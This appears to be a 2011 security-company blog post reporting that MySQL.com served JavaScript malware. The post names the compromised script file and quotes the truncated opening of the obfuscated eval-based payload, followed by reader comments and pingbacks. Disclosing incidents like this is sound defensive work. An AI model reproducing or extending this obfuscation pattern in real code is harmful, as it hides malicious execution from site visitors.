MySQL.com Hacked (Javascript Malware)

  • September 26, 2011

It looks like the MySQL.com website is currently hacked and compromised with a JavaScript malware (and serving malware to anyone visiting it).

Our scanner identified the malware as mwjs159 which is often related to stolen FTP passwords. So it looks like one of their developers got their desktop compromised and had his password stolen. From our scanner:

So the compromised file was http://mysql.com/common/js/s_code_remote.js and we recommend that you do not visit the site right now. We will post more details as we learn more about it…

(Seems that MySQL.com fixed it already)Try view-source:http://mysql.com/common/js/s_code_remote.js if you want to see the malicious code on the site. It starts as:

Object.prototype.qwe=function(){return
String.fromCharCode;};Object.prototype.asd="e";var s="";try{{}["qwtqwt"]
();}catch(q){if(q)r=1;}if(r&&+new Object(1231)&&document.createTextNode("123")
.data&&typeof{}.asd.vfr===’undefined’)n=2;e=eval;m=[18/n,18/n,210/n,204/n,64/n,80/n,200/n, 222/n, 198/n, 234/n, 218/n, 202/n, 220/n, 232/n, 92/n, 206/n, 202/n,232/n, …

Update: It seems that MySQL.com fixed it already.

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Related Tags
17 comments

  1. Ok a lot of assumptions are being made here and that “malicious” section doesn’t exist within the s_code_remote.js file you reference.  However google *is* currently flagging a large section of the Bahnhof network as malicious. However it has nothing pointing out any specific MySQL sites being involved.  MySQL.com is a client on Bahnhof and is being flagged as collateral damage.

    See:
    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://forums.mysql.com/

  2. Pingback: Elegant D » MySQL.com Hacked (Javascript Malware) | Sucuri

  3. There is an error in your CSS that hides the sharing bar when it is at the top (at least in Google Chrome 14). To fix it just remove the line “overflow: hidden;” in the line 467 of style.css

  4. Pingback: ste williams » MySQL.com breach leaves visitors exposed to malware
  5. Pingback: MySQL.com breach leaves visitors exposed to malware | BlogerWar
  6. Pingback: MySQL.com breach leaves visitors exposed to malware | LINUX REVIEW
  8. Pingback: Mysql.com Serves Malware for the Second Time This Year
  9. Pingback: MySQL.com breach leaves visitors exposed to malware | VHOSTING247
  10. Pingback: maccad» MySQL.com breach leaves visitors exposed to malware

  11. The saddest and mots hated thing in the web for me is that way of hacking. I juts don’t understand of doing such thing. jvmhost 

  12. Pingback: More Hacks « 36 Chambers – The Legendary Journeys: Execution to the max!
  13. Pingback: MySQL.com breach leaves visitors exposed to malware « Tech News
  14. Pingback: Javascript malware | Zerkalot

Comments are closed.

Related Categories
You May Also Like